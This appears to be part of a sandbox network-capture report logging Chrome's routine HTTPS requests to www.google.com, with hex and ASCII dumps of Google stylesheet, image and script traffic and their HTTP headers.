2024-09-26 15:55:24 UTC	581	IN	Data Raw: 3a 72 6f 6f 74 7b 2d 2d 43 4f 45 6d 59 3a 23 31 66 31 66 31 66 3b 2d 2d 78 68 55 47 77 63 3a 23 66 66 66 7d 3a 72 6f 6f 74 7b 2d 2d 76 5a 65 30 6a 62 3a 23 61 38 63 37 66 61 3b 2d 2d 6e 77 58 6f 62 62 3a 23 36 33 38 65 64 34 3b 2d 2d 56 75 5a 58 42 64 3a 23 30 30 31 64 33 35 3b 2d 2d 75 4c 7a 33 37 63 3a 23 35 34 35 64 37 65 3b 2d 2d 6a 49 4e 75 36 63 3a 23 30 30 31 64 33 35 3b 2d 2d 54 79 56 59 6c 64 3a 23 30 62 35 37 64 30 3b 2d 2d 5a 45 70 50 6d 64 3a 23 63 33 64 39 66 62 3b 2d 2d 51 57 61 61 61 66 3a 23 36 33 38 65 64 34 3b 2d 2d 44 45 65 53 74 66 3a 23 66 35 66 38 66 66 3b 2d 2d 54 53 57 5a 49 62 3a 23 65 35 65 64 66 66 3b 2d 2d 42 52 4c 77 45 3a 23 64 33 65 33 66 64 3b 2d 2d 67 53 35 6a 58 62 3a 23 64 61 64 63 65 30 3b 2d 2d 41 71 6e 37 78 64 3a 23 Data Ascii: :root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#
2024-09-26 15:55:24 UTC	1390	IN	Data Raw: 6c 54 64 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 7d 2e 79 55 54 4d 6a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 56 44 67 56 69 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 54 55 4f 73 55 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 73 6e 61 63 6b 62 61 72 2d 73 68 6f 77 7b 66 72 6f 6d 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 Data Ascii: lTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:translateY(0
2024-09-26 15:55:24 UTC	1390	IN	Data Raw: 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 36 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 38 38 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 62 37 37 48 4b 66 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 30 70 78 7d 7d 2e 56 39 4f 31 59 64 20 2e 72 49 78 73 76 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 7d 2e 56 39 4f 31 59 64 20 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 56 39 4f 31 59 64 20 2e 73 48 46 4e 59 64 20 67 2d 66 6c 61 74 2d 62 75 74 74 6f 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 6a 68 5a 76 6f 64 7b 6c 65 66 74 3a 31 36 70 78 3b 72 69 67 68 Data Ascii: :inline-block;max-width:568px;min-width:288px;text-align:left}.b77HKf{border-radius:8px}.sHFNYd{margin-left:40px}}.V9O1Yd .rIxsve{display:block;padding:8px 0}.V9O1Yd .sHFNYd{margin-left:0}.V9O1Yd .sHFNYd g-flat-button{padding-left:0}.jhZvod{left:16px;righ
2024-09-26 15:55:24 UTC	735	IN	Data Raw: 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 33 2e 34 33 35 70 78 3b 77 69 64 74 68 3a 31 33 2e 34 33 35 70 78 7d 2e 49 42 50 5a 75 20 2e 6f 51 63 50 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 74 6f 70 3a Data Ascii: eft:1px solid rgba(0,0,0,.2);border-right:none;border-top:1px solid rgba(0,0,0,.2);box-sizing:border-box;height:13.435px;width:13.435px}.IBPZu .oQcPt{border-bottom:1px solid rgba(0,0,0,.2);border-left:none;border-right:1px solid rgba(0,0,0,.2);border-top:
2024-09-26 15:55:24 UTC	136	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 30 30 6d 73 2c 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 32 35 30 6d 73 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 69 6e 73 65 74 3a 30 7d 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 75 67 67 65 73 74 69 6f 6e 5f 67 72 6f 75 70 2e 63 73 73 2e 6d 61 70 20 2a 2f 73 65 6e 74 69 6e 65 6c 7b 7d Data Ascii: ound-color 100ms,visibility 0s 250ms;position:fixed;visibility:hidden;inset:0}/# sourceMappingURL=suggestion_group.css.map /sentinel{}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.16	49714	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:24 UTC	1368	OUT	GET /logos/2024/popcorn/rc4/cta.png HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:25 UTC	691	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 27042 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:08 GMT Expires: Thu, 25 Sep 2025 19:16:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/png Age: 74356 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:25 UTC	699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 59 00 00 00 b2 08 03 00 00 00 df d8 4c 1c 00 00 02 f7 50 4c 54 45 47 70 4c 9f 3c 5f 9c 2d 2c d7 3f 24 b1 20 2c 74 17 76 9b 1d 2e 5a 12 6f 2c 11 67 74 58 d5 a8 23 2a 35 11 5d 83 28 32 9c 29 35 85 22 3a 7f 20 39 76 20 2c 71 1b 3d 64 24 23 5f 0b 42 41 01 48 3a 02 43 30 03 3f 20 13 2f 5f 32 38 34 0f 47 56 1f 1a 29 09 41 23 15 45 8e 25 34 51 01 4a 49 01 4b 89 24 36 96 1e 3c 97 15 31 96 0e 26 94 36 38 94 28 32 9a 2b 30 a0 22 2a ad 25 25 a9 33 2c d7 68 1b db 7a 16 ba 46 2b bc 36 23 c9 61 20 f1 96 0c fe a3 09 fe 9b 0d b1 38 2a ed 8d 09 c5 42 23 e3 84 16 cb 4e 03 ca 52 29 a2 2f 2e 69 1f 06 c1 4d 2a 5e 16 03 ab 47 1d 3f 26 14 55 08 01 5e 36 58 65 06 00 5b 3e 77 5c 41 81 60 45 8a a5 3c 33 f6 8b 20 f1 a1 15 d0 Data Ascii: PNGIHDRYLPLTEGpL<_-,?$ ,tv.Zo,gtX#5](2)5": 9v ,q=d$#_BAH:C0? /_284GV)A#E%4QJIK$6<1&68(2+0"%%3,hzF+6#a 8B#NR)/.iM^G?&U^6Xe[>w\A`E<3
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 8b dc 45 08 01 e9 76 21 ea af 9a e3 a7 b1 da 9d cb d0 94 e1 d4 92 ec d4 90 f3 c2 91 dd b1 8e db 9e 8b dd a0 8f e4 a7 93 ed ab 98 f6 b0 9d fe 9b 86 d4 8c 79 ba 98 7f c8 9e 95 ec b6 a3 ff a4 a3 fe b1 7d c1 a0 21 46 a8 22 4b b6 ae ff 9d 71 b6 97 2b 51 9f 9d f7 9b 5f 9b b0 22 50 ef a9 fe b6 6b dd 91 63 a0 f2 0f f3 84 00 00 00 fd 74 52 4e 53 00 1a 42 62 7b 71 9c 9b a2 3e bc c1 ca dd ff ff ff ff ff ff ff ff ff ff ff e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: Ev!y}!F"Kq+Q_"PkctRNSBb{q>
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: c7 e2 ad ea ce 74 78 d6 91 fd c3 c2 c0 8b fd 3f 21 35 33 da 93 32 ed 9f 5b 1b ac 46 68 d1 d8 51 ac a3 1c b3 80 4d 7b aa e0 6a b0 5e 81 14 d4 f5 bb 8b ad b0 aa 93 a2 45 53 10 47 88 24 d8 af 2e 36 97 1d cb fb cd 72 8c 36 a1 4b 0b c2 0a 29 56 6a 08 19 70 1a cf 4c eb 40 05 ea 30 59 9a 96 17 70 9a f3 68 91 b4 3f 1f 26 5b 97 42 41 b3 80 46 8b c9 a0 97 15 a5 68 51 b6 ef d2 c1 94 e5 b4 1f b8 90 26 c6 55 1d 26 e2 0c b5 03 2a 63 db ed 76 bb 8b a1 e0 3c c5 95 2d 5b b4 e7 af d6 12 1a 2c 45 f5 f5 fe 14 13 8d c8 e6 93 19 41 1e a7 19 ac c8 83 b5 c6 d1 5f 8c f1 ec e4 56 74 7a 72 72 52 1c a2 cb fc 66 1e 3c f4 6c b9 8f 83 9f fe 87 6c f5 54 89 41 4f 60 d0 10 46 51 03 ac ae cb a7 7c ef 65 db 62 c7 b6 5d c8 4e 8b b6 76 86 15 56 c8 82 f9 ec 9c 96 a5 3a 89 d0 ee 75 50 b4 0a 37 Data Ascii: tx?!532[FhQM{j^ESG$.6r6K)VjpL@0Yph?&[BAFhQ&U&*cv<-[,EA_VtzrrRf<llTAO`FQ\|eb]NvV:uP7
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 5b d4 31 62 36 13 e7 22 b2 f8 99 fe 27 b6 e2 be 48 4e c1 59 de 36 cb d3 59 23 96 b8 35 99 39 74 9e 2e 69 56 85 d0 78 55 ad d2 7c 4a 92 63 e0 fb 95 8a e7 2d 90 50 5a 28 23 f0 16 4a 9e d8 07 73 65 5f de 2c dd 50 91 8a 50 aa 4d 21 b1 b2 27 57 4c c5 3a 66 ac 37 eb 37 6e de f8 01 6e fe 85 95 16 3d bd 71 63 d0 89 19 0b 04 56 82 0b 99 b5 ef d2 98 d9 6b 22 3f a2 d1 ea 32 88 d0 49 42 c3 e6 32 dd 9a ab 66 67 8a f6 b2 aa 96 e7 9f 3f 83 91 4e 43 34 5a a5 56 16 02 7a b5 b9 4c 63 5e c3 03 74 bb b4 b0 ec 19 ad 9e 87 a7 2b 97 fd 06 9a 7c 50 df 2f 60 1e a4 5a d6 83 29 17 3b 09 20 5f c8 cb e5 c3 a2 d3 6c 4e ff 88 58 30 7f 03 e5 e0 ff 02 1c d4 b8 ac f2 09 b2 47 a6 99 cd a9 59 7b 61 e0 38 b3 12 59 14 c9 2f 85 15 5a eb cd 8e d0 6a 35 71 65 2d 33 83 71 ab 47 d7 a5 56 a5 e4 a4 Data Ascii: [1b6"'HNY6Y#59t.iVxU\|Jc-PZ(#Jse_,PPM!'WL:f77nn=qcVk"?2IB2fg?NC4ZVzLc^t+\|P/`Z); _lNX0GY{a8Y/Zj5qe-3qGV
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: cb ed d1 bc 14 5a 47 d4 14 c2 82 68 25 2c 07 97 98 d8 3c 9b 74 cd ac 98 4b cd 9a 6d 56 46 56 6a 80 de 91 c9 35 3b 5d 2d 04 4a 39 cb ac ea d5 d3 27 64 70 72 7a fa e6 c3 ab 83 c3 4f 9d 95 7a 25 f0 58 fb 1a 5e 83 79 6d 04 29 ed c6 1c 74 30 af 9b 08 6c ca c0 06 1a cf f6 f6 86 7b 7b fd fe d9 e0 18 4e 33 fa 7d d8 4f 84 4d f4 68 93 6e af 95 7d 59 e3 aa 5b c8 a5 d9 75 cd ec 38 af 94 3a 96 23 ab d8 c2 2c c8 b9 61 e8 aa da bc 3b 33 ab d7 f2 8e 74 60 cc e6 08 33 cb 9d 54 3c a6 cc 1e 3c a0 5a 07 97 db 9d 75 06 76 5c 66 c7 c8 65 6c 99 db d3 d3 7d c8 fd f9 e9 ca ca 7a d0 f0 98 57 34 b5 ca 65 2b a6 75 89 2b 0a 41 6a e8 4c 62 9a 1a e5 80 76 7c fc f9 0c 56 81 3e a5 ce 05 91 4b 50 4c 40 32 e7 07 a4 91 c9 85 d9 c2 88 d9 f9 f1 5a 8f ec 7e c1 ed df 9a 4e 5e 6c 62 3b 93 01 95 Data Ascii: ZGh%,<tKmVFVj5;]-J9'dprzOz%X^ym)t0l{{N3}OMhn}Y[u8:#,a;3t`3T<<Zuv\fel}zW4e+u+AjLbv\|V>KPL@2Z~N^lb;
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 16 32 70 65 6f f5 89 50 a6 28 2c cb 8d ed ed b5 3d de a1 c8 17 75 16 eb 1b 6e 2e 5c ff 59 02 eb 4c 67 1d 0a 5d bc 47 dd 04 2a 6d 18 08 66 d0 58 fa 56 e9 5b a6 6c 8e e9 89 77 e8 ba 7c 99 45 51 be 75 18 58 4e 22 82 d2 5e 58 e9 4a 81 ec 7f b4 be ce 01 4f 2d 1f 5d 2c ae 21 e9 8a 70 51 21 26 a3 b5 8b c4 95 1b 4e a4 f1 2f 4e ca 8d f6 31 31 11 95 bb 55 74 5a c5 0d 77 8a c4 01 8b 10 ae d1 dc 0c 2d 4a cb 0b da 6b a8 ec 32 5c d1 51 cb 6a 15 ac a7 8a 1c c5 00 55 1c 74 e5 37 85 90 8b 1d 45 2b 2b f2 27 71 46 c6 78 d8 93 2a 6f f9 44 ca 1b bb 22 3f 63 59 4b a5 41 4a bf 08 63 6a 1c 34 0c 6a 5e 5e ce d6 db 6d c9 95 6d 3f 80 ec 88 94 65 57 66 0d ee 67 8d 44 22 98 07 6a 38 6c 56 72 04 b3 a0 ee 1c 40 5f e3 90 ed cd 71 a1 6a b4 57 25 79 0d eb 31 8c de 18 ee ab c7 c4 35 6b 0b Data Ascii: 2peoP(,=un.\YLg]GmfXV[lw\|EQuXN"^XJO-],!pQ!&N/N11UtZw-Jk2\QjUt7E++'qFxoD"?cYKAJcj4j^^mm?eWfgD"j8lVr@_qjW%y15k
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: b8 bd d3 d7 3e 85 1d f8 c3 32 b5 b5 ac 11 b6 ca 87 5d 24 7b 4b c2 2e a3 b1 bd 72 b6 32 eb 67 0f 4d 55 ce 27 9f 7c b2 bb bb 8b e2 16 2b b0 7d 8b 64 8d 07 37 e3 1a ac 28 26 2c 39 d4 d9 32 ec 2b c8 c3 75 16 d8 65 ec 31 7f 11 3e 77 e5 e1 17 5d f5 81 7a 5c d7 35 ec ae 0e 54 9b ae 55 26 62 3c d2 0e 59 4f 4d 95 6d 10 a0 b1 48 74 49 8c cd ee e9 e9 c4 b6 b7 37 3b 03 a6 68 5c 14 b2 6c 97 a0 54 f0 17 7e f4 b9 43 ac f6 e1 01 90 6e c2 22 6d 20 b8 15 4c 37 37 0d a4 eb c4 74 94 ff bc 08 c5 62 8b 45 89 cf 98 07 cb a8 2d 64 1d c5 0e 9a 04 3a ab 42 6d b5 b2 7e c2 b0 bb 9f 3c 7f fe 7c 77 f7 f9 8b 6c 4c dc e3 3c 04 38 6c 45 ae 24 0b 48 c2 c4 46 9d a5 cf 0b f2 b0 03 d1 bf cb 23 98 6b ec 52 ea 0e 7f 3e 06 b4 17 02 d5 75 35 21 13 f6 c2 d0 10 96 fa a8 2c 21 b6 23 e1 01 4f 33 c9 Data Ascii: >2]${K.r2gMU'\|+}d7(&,92+ue1>w]z\5TU&b<YOMmHtI7;h\lT~Cn"m L77tbE-d:Bm~<\|wlL<8lE$HF#kR>u5!,!#O3
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 3a ad 64 5e 64 82 4d f7 f9 e9 3b 42 bb eb 18 f4 7a af fb a3 9f b8 d4 f1 27 4f c1 95 d0 32 dc fb 77 ff 14 25 42 9d ec 22 d2 c0 52 76 59 d0 3e 50 1c 44 96 c3 14 5c 4f 38 1d 38 4b 61 88 c8 5a c1 32 e7 93 75 ba bf e9 a4 0b 8b 97 c7 13 b8 71 c5 83 1d 29 cf 8d c1 9b 48 5d 59 f5 f6 1b 5c 01 76 40 92 e0 22 18 d6 c4 15 cf 9c b3 6b 99 6c 56 17 9a 5e c9 b3 32 6b 18 71 f7 a3 b1 72 99 d0 3a b8 ed a5 ee 0c 9e fd 11 58 61 21 e3 f2 ab b6 50 d3 63 fd 8c 15 4f 07 07 02 6c 8b 71 ed d3 c7 4f 9f 3e 35 d0 12 58 aa 13 3e 27 9e e0 db 64 bf 7b df 5a 1c 58 d0 de b6 bf d5 46 a0 48 d8 18 a6 6b 33 80 76 97 ec f7 e8 fd a6 27 93 79 db de b4 e8 ea da 1d 70 9d f1 dc e8 76 c8 38 1a de 15 08 82 ac 2a 49 1a c8 86 76 c8 0e cb 2e 3f 95 04 f0 ac d9 b0 10 36 be 4b b9 7c b6 54 ae d8 26 d7 d8 b2 Data Ascii: :d^dM;Bz'O2w%B"RvY>PD\O88KaZ2uq)H]Y\v@"klV^2kqr:Xa!PcOlqO>5X>'d{ZXFHk3v'ypv8*Iv.?6K\|T&
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 2b c1 c7 b2 a9 e8 7a a3 79 cc 55 eb 0e b8 a7 f7 66 87 b7 db 1b f6 03 ac 25 64 89 ec 98 7a d3 6f 80 b5 52 c5 e5 37 7e d4 5e e1 64 7a 36 5b d1 81 30 96 ec 9f c0 f6 cd f4 14 a9 90 0d 41 c1 00 e4 cb 16 80 16 a2 3d 70 7c c9 44 4a 7f ef cc fc fb 08 dc f9 ef eb 5e 8e 89 bd 74 2d c3 2f a0 0d b5 47 bc d3 6b b0 6c f8 bb 67 cf 9f 83 ed c6 c6 e3 27 00 fb 94 6b 5b 34 60 b2 64 a7 56 e1 f3 43 9a 85 87 0a e7 2a 58 29 f0 92 e4 a4 2c 20 bd fb 7b 56 b2 33 ad 91 f6 8b dd 11 07 bb 96 8a ae 37 2e 67 8d 6d 84 1b a4 41 2a 88 7a 7d 83 bb 21 3b 60 78 76 48 0e fa 19 ac 45 40 8a 4b c6 ca 95 18 16 7f 3d 99 8e c5 2e e7 33 b1 d8 04 da d7 89 89 50 30 9f c9 07 a3 18 a9 9f a9 d5 3c 83 38 36 9f 2f 14 4a f1 52 3c a5 a3 3f f3 fb 31 3e 70 bb cb b6 58 b2 52 a6 c2 c0 df 8f 9c d8 bb 86 ed a4 6d Data Ascii: +zyUf%dzoR7~^dz6[0A=p\|DJ^t-/Gklg'k[4`dVCX), {V37.gmAz}!;`xvHE@K=.3P0<86/JR<?1>pXRm
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: e8 5a b4 5e 68 2d 79 82 93 63 56 cb d6 6a c9 0a 72 23 1b 8a 92 a7 43 14 24 b8 16 8c e0 2f e0 83 1e 7c 87 c2 74 ba 8c 41 56 9c f6 cb 6f 8e f4 8f a6 2a 54 d4 c5 41 d9 20 db 2d 3c 4b 2f 20 fb dd 77 02 ec bd 7b 9b 9b cf 37 a0 67 e3 0d 76 a5 f1 55 a3 fd a3 47 8f 1e ca 28 be 0e 08 5a 9e 78 cd 58 db 58 75 1c 69 00 b2 60 8c bf f9 e0 90 66 5a 35 26 8b 32 e2 d0 d2 a0 a3 d3 a9 6a 11 b5 fd cc d5 3d 9e bd b9 d7 b2 03 66 b6 13 c3 6a f7 88 5f 96 27 a0 32 5a a8 9b 2b 98 02 60 a6 92 29 64 07 03 9e 5a 1d db b5 20 5c 0b 03 02 2a d7 02 d7 56 72 f3 66 2d 2c cc 0f 95 0a b9 2c b8 e2 a7 81 62 37 98 0d 05 f0 e9 0b c6 f2 46 68 11 b6 b4 fc ad 15 f5 ca 28 76 db 31 28 2b 63 cf dc cf 68 fb fb b4 31 f2 ec 15 70 45 d0 7e 47 7a 75 b6 51 22 35 14 1b e9 2c 92 fd ff 6c 6f 6f d8 e5 87 0f 1f Data Ascii: Z^h-ycVjr#C$/\|tAVoTA -<K/ w{7gvUG(ZxXXui`fZ5&2j=fj_'2Z+`)dZ \Vrf-,,b7Fh(v1(+ch1pE~GzuQ"5,loo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.16	49715	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:24 UTC	3918	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplu [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:25 UTC	831	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1037389 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:55:50 GMT Expires: Fri, 26 Sep 2025 08:55:50 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25174 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
